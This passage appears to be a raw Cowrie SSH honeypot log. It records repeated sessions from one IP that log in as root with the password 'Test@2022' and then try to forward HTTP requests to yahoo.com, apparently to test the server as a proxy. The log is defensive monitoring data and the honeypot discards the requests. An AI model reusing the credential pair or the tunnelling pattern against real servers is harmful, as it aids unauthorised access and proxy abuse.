{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:25.985191Z","src_ip":"213.209.150.239","session":"1fb8c7cde09f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31211,"dst_ip":"1.2.3.4","dst_port":22,"session":"019e4ff291c6","protocol":"ssh","message":"New connection: 213.209.150.239:31211 (1.2.3.4:22) [session: 019e4ff291c6]","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.031448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.032323Z","src_ip":"213.209.150.239","session":"019e4ff291c6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.079932Z","src_ip":"213.209.150.239","session":"019e4ff291c6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.314591Z","src_ip":"213.209.150.239","session":"019e4ff291c6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":25106,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:25106","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.362621Z","session":"019e4ff291c6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.409879Z","src_ip":"213.209.150.239","session":"019e4ff291c6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":16695,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:16695","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.545563Z","session":"019e4ff291c6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.592676Z","src_ip":"213.209.150.239","session":"019e4ff291c6"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.641221Z","src_ip":"213.209.150.239","session":"019e4ff291c6"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31249,"dst_ip":"1.2.3.4","dst_port":22,"session":"046e93edc4c9","protocol":"ssh","message":"New connection: 213.209.150.239:31249 (1.2.3.4:22) [session: 046e93edc4c9]","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.687282Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.688408Z","src_ip":"213.209.150.239","session":"046e93edc4c9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.735484Z","src_ip":"213.209.150.239","session":"046e93edc4c9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.969847Z","src_ip":"213.209.150.239","session":"046e93edc4c9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":12779,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:12779","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.017916Z","session":"046e93edc4c9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.065242Z","src_ip":"213.209.150.239","session":"046e93edc4c9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":28770,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:28770","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.201519Z","session":"046e93edc4c9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.248662Z","src_ip":"213.209.150.239","session":"046e93edc4c9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.296800Z","src_ip":"213.209.150.239","session":"046e93edc4c9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31301,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d398b7732c7","protocol":"ssh","message":"New connection: 213.209.150.239:31301 (1.2.3.4:22) [session: 5d398b7732c7]","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.343204Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.343876Z","src_ip":"213.209.150.239","session":"5d398b7732c7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.391327Z","src_ip":"213.209.150.239","session":"5d398b7732c7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.626380Z","src_ip":"213.209.150.239","session":"5d398b7732c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":31846,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:31846","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.675001Z","session":"5d398b7732c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.722258Z","src_ip":"213.209.150.239","session":"5d398b7732c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":26033,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:26033","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.857512Z","session":"5d398b7732c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.904865Z","src_ip":"213.209.150.239","session":"5d398b7732c7"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.952773Z","src_ip":"213.209.150.239","session":"5d398b7732c7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31356,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d5c844d95de","protocol":"ssh","message":"New connection: 213.209.150.239:31356 (1.2.3.4:22) [session: 1d5c844d95de]","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.008419Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.009350Z","src_ip":"213.209.150.239","session":"1d5c844d95de"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.065884Z","src_ip":"213.209.150.239","session":"1d5c844d95de"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.347907Z","src_ip":"213.209.150.239","session":"1d5c844d95de"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":30703,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:30703","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.405428Z","session":"1d5c844d95de"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.462295Z","src_ip":"213.209.150.239","session":"1d5c844d95de"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":11262,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:11262","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.618968Z","session":"1d5c844d95de"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.675556Z","src_ip":"213.209.150.239","session":"1d5c844d95de"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.732759Z","src_ip":"213.209.150.239","session":"1d5c844d95de"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31413,"dst_ip":"1.2.3.4","dst_port":22,"session":"716bf1da88ec","protocol":"ssh","message":"New connection: 213.209.150.239:31413 (1.2.3.4:22) [session: 716bf1da88ec]","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.778880Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.779978Z","src_ip":"213.209.150.239","session":"716bf1da88ec"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.827176Z","src_ip":"213.209.150.239","session":"716bf1da88ec"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.062167Z","src_ip":"213.209.150.239","session":"716bf1da88ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":12342,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:12342","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.110395Z","session":"716bf1da88ec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.157526Z","src_ip":"213.209.150.239","session":"716bf1da88ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":10154,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:10154","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.293490Z","session":"716bf1da88ec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.340738Z","src_ip":"213.209.150.239","session":"716bf1da88ec"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.389581Z","src_ip":"213.209.150.239","session":"716bf1da88ec"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31453,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bc1bf0406d6","protocol":"ssh","message":"New connection: 213.209.150.239:31453 (1.2.3.4:22) [session: 5bc1bf0406d6]","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.445421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.446314Z","src_ip":"213.209.150.239","session":"5bc1bf0406d6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-2